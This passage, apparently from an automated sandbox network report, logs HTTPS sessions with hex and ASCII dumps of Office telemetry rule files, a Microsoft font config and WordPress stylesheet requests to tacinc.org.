                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC1369INData Raw: 69 76 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 64 61 74 61 54 61 62 6c 65 73 5f 70 61 67 69 6e 61 74 65 20 2e 70 61 67 69 6e 61 74 65 5f 62 75 74 74 6f 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 64 61 74 61 54 61 62 6c 65 73 5f 70 61 67 69 6e 61 74 65 20 2e 70 61 67 69 6e 61 74 65 5f 62 75 74 74 6f 6e 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 64 61 74 61 54 61 62 6c 65 73 5f 70 61 67 69 6e 61 74 65 20 2e 70 61 67 69 6e 61 74 65 5f 62 75 74 74 6f 6e 3a 61 66 74 65 72 2c 2e 64 61 74 61 54 61 62 6c 65 73 5f 70 61 67 69 6e 61 74 65 20 2e 70 61 67 69 6e 61 74 65 5f 62 75 74 74 6f 6e 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 64
                                                                                                                                                                                                                              Data Ascii: ive;text-decoration:underline}.dataTables_paginate .paginate_button:first-child{margin-left:0}.dataTables_paginate .paginate_button:last-child{margin-right:0}.dataTables_paginate .paginate_button:after,.dataTables_paginate .paginate_button:before{color:#d
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC1241INData Raw: 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 61 74 61 54 61 62 6c 65 73 5f 73 63 72 6f 6c 6c 48 65 61 64 20 74 61 62 6c 65 2e 74 61 62 6c 65 70 72 65 73 73 7b 6d 61 72 67 69 6e 3a 30 7d 2e 64 61 74 61 54 61 62 6c 65 73 5f 73 63 72 6f 6c 6c 42 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 6f 76 65 72 66 6c 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 7d 2e 64 61 74 61 54 61 62 6c 65 73 5f 73 63 72 6f 6c 6c 42 6f 64 79 20 2e 74 61 62 6c 65 70 72 65 73 73 20 74 68 65 61 64 20 74 68 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 22 7d 2e 64 61 74 61 54 61 62 6c 65 73 5f 77 72 61 70 70 65 72 20 2e 64 61 74 61 54 61 62 6c 65 73 5f 73 63 72 6f 6c 6c 20 64 69 76 2e 64 61 74 61 54 61 62 6c 65 73 5f 73 63 72 6f 6c 6c 42 6f 64 79 20 74 64 3e
                                                                                                                                                                                                                              Data Ascii: width:100%!important}.dataTables_scrollHead table.tablepress{margin:0}.dataTables_scrollBody{-webkit-overflow-scrolling:touch}.dataTables_scrollBody .tablepress thead th:after{content:""}.dataTables_wrapper .dataTables_scroll div.dataTables_scrollBody td>
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              39192.168.2.64976813.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:04 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 404
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                              x-ms-request-id: 8eb541d3-201e-0071-4881-20ff15000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180404Z-r1755647c66cdf7jx43n17haqc00000009c00000000045hk
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              40192.168.2.64976713.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:04 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                              x-ms-request-id: e2670bef-801e-008f-375d-232c5d000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180404Z-17fbfdc98bb8xnvm6t4x6ec5m4000000063g000000000fpu
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              41192.168.2.64976913.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:04 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                              x-ms-request-id: 6949b098-b01e-0084-1a35-21d736000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180404Z-r1755647c66r2hg89mqr09g9w000000000wg00000000693d
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              42192.168.2.64976613.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:04 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                              x-ms-request-id: a019224c-501e-0047-645d-23ce6c000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180404Z-17fbfdc98bb9dlh7es9mrdw2qc00000005xg00000000afsa
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              43192.168.2.64977013.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:04 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 428
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                              x-ms-request-id: 8a7344d1-601e-0084-805a-236b3f000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180404Z-17fbfdc98bbvwcxrk0yzwg4d58000000066g000000004g98
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              44192.168.2.649765184.28.90.27443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                              Range: bytes=0-2147483646
                                                                                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC514INHTTP/1.1 200 OK
                                                                                                                                                                                                                              ApiVersion: Distribute 1.1
                                                                                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                              Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                              X-CID: 11
                                                                                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                              X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                              Cache-Control: public, max-age=81697
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:04 GMT
                                                                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              X-CID: 2
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              45192.168.2.649772141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC595OUTGET /wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC478INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:04 GMT
                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Tue, 15 Oct 2024 16:58:20 GMT
                                                                                                                                                                                                                              ETag: W/"670e9f2c-4057"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614816
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5c1cc056c02-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC891INData Raw: 34 30 35 37 0d 0a 2f 2a 2a 0a 20 2a 20 53 77 69 70 65 72 20 38 2e 34 2e 35 0a 20 2a 20 4d 6f 73 74 20 6d 6f 64 65 72 6e 20 6d 6f 62 69 6c 65 20 74 6f 75 63 68 20 73 6c 69 64 65 72 20 61 6e 64 20 66 72 61 6d 65 77 6f 72 6b 20 77 69 74 68 20 68 61 72 64 77 61 72 65 20 61 63 63 65 6c 65 72 61 74 65 64 20 74 72 61 6e 73 69 74 69 6f 6e 73 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 77 69 70 65 72 6a 73 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 34 2d 32 30 32 32 20 56 6c 61 64 69 6d 69 72 20 4b 68 61 72 6c 61 6d 70 69 64 69 0a 20 2a 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 6f 6e 3a 20 4e 6f 76 65 6d 62 65 72 20 32 31 2c 20 32 30
                                                                                                                                                                                                                              Data Ascii: 4057/** * Swiper 8.4.5 * Most modern mobile touch slider and framework with hardware accelerated transitions * https://swiperjs.com * * Copyright 2014-2022 Vladimir Kharlampidi * * Released under the MIT License * * Released on: November 21, 20
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC1369INData Raw: 41 38 41 75 52 77 4d 59 47 6b 41 50 79 77 4c 31 33 6a 61 59 32 42 6b 59 47 41 38 38 50 38 41 67 78 34 6a 2b 2f 38 66 51 44 59 66 41 31 41 45 42 57 67 44 41 49 42 32 42 4f 6f 41 65 4e 70 6a 59 47 52 67 59 4e 42 68 34 47 64 67 59 67 41 42 45 4d 6e 49 41 42 4a 7a 59 4e 41 44 43 51 41 41 43 57 67 41 73 51 42 34 32 6d 4e 67 59 66 7a 43 4f 49 47 42 6c 59 47 42 30 59 63 78 6a 59 47 42 77 52 31 4b 66 32 57 51 5a 47 68 68 59 47 42 69 59 47 56 6d 67 41 46 47 42 69 51 51 6b 4f 61 61 77 74 44 41 6f 4d 42 51 78 58 6a 67 2f 77 45 47 50 63 59 44 44 41 34 77 4e 55 41 32 43 43 67 77 73 41 41 41 4f 34 45 4c 36 67 41 41 65 4e 70 6a 32 4d 30 67 79 41 41 43 71 78 67 47 4e 57 42 6b 5a 32 44 34 2f 77 4d 41 2b 78 6b 44 64 67 41 41 41 48 6a 61 59 32 42 67 59 47 61 41 59 42 6b 47
                                                                                                                                                                                                                              Data Ascii: A8AuRwMYGkAPywL13jaY2BkYGA88P8Agx4j+/8fQDYfA1AEBWgDAIB2BOoAeNpjYGRgYNBh4GdgYgABEMnIABJzYNADCQAACWgAsQB42mNgYfzCOIGBlYGB0YcxjYGBwR1Kf2WQZGhhYGBiYGVmgAFGBiQQkOaawtDAoMBQxXjg/wEGPcYDDA4wNUA2CCgwsAAAO4EL6gAAeNpj2M0gyAACqxgGNWBkZ2D4/wMA+xkDdgAAAHjaY2BgYGaAYBkG
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC1369INData Raw: 57 72 44 79 63 41 41 41 41 41 41 41 48 2f 2f 77 41 43 65 4e 70 6a 59 47 52 67 59 4f 41 42 59 68 6b 67 5a 67 4a 43 5a 67 5a 4e 42 6b 59 47 4c 51 5a 74 49 4a 73 46 4c 4d 59 41 41 41 77 33 41 4c 67 41 65 4e 6f 6c 69 7a 45 4b 67 44 41 51 42 43 63 68 52 62 43 32 73 46 45 52 30 59 44 36 71 56 51 69 42 43 76 2f 48 39 65 7a 47 49 36 5a 35 58 42 41 77 38 43 42 4b 2f 6d 35 69 51 51 56 61 75 56 62 58 4c 6e 4f 72 4d 5a 76 32 6f 4c 64 4b 46 61 38 50 6a 75 72 75 32 68 4a 7a 47 61 62 6d 4f 53 4c 7a 4e 4d 7a 76 75 74 70 42 33 4e 34 32 6d 4e 67 5a 47 42 67 34 47 4b 51 59 7a 42 68 59 4d 78 4a 4c 4d 6c 6a 34 47 42 67 41 59 6f 77 2f 50 2f 50 41 4a 4a 68 4c 4d 36 73 53 6f 57 4b 66 57 43 41 41 77 44 41 6a 67 62 52 41 41 42 34 32 6d 4e 67 59 47 42 6b 41 49 49 62 43 5a 6f 35 49
                                                                                                                                                                                                                              Data Ascii: WrDycAAAAAAAH//wACeNpjYGRgYOABYhkgZgJCZgZNBkYGLQZtIJsFLMYAAAw3ALgAeNolizEKgDAQBCchRbC2sFER0YD6qVQiBCv/H9ezGI6Z5XBAw8CBK/m5iQQVauVbXLnOrMZv2oLdKFa8Pjuru2hJzGabmOSLzNMzvutpB3N42mNgZGBg4GKQYzBhYMxJLMlj4GBgAYow/P/PAJJhLM6sSoWKfWCAAwDAjgbRAAB42mNgYGBkAIIbCZo5I
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC1369INData Raw: 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 2c 2e 73 77 69 70 65 72 2d 33 64 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 2d 73 68 61 64 6f 77 2c 2e 73 77 69 70 65 72 2d 33 64 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 2d 73 68 61 64 6f 77 2d 62 6f 74 74 6f 6d 2c 2e 73 77 69 70 65 72 2d 33 64 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 2d 73 68 61 64 6f 77 2d 6c 65 66 74 2c 2e 73 77 69 70 65 72 2d 33 64 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 2d 73 68 61 64 6f 77 2d 72 69 67 68 74 2c 2e 73 77 69 70 65 72 2d 33 64 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 2d 73 68 61 64 6f 77 2d 74 6f 70 2c 2e 73 77 69 70 65 72 2d 33 64 20 2e 73 77 69 70 65 72 2d 77 72 61 70 70 65 72 7b 74 72 61 6e 73 66 6f 72 6d 2d 73 74 79 6c 65 3a 70 72 65 73 65 72 76 65 2d 33 64 7d 2e 73 77 69
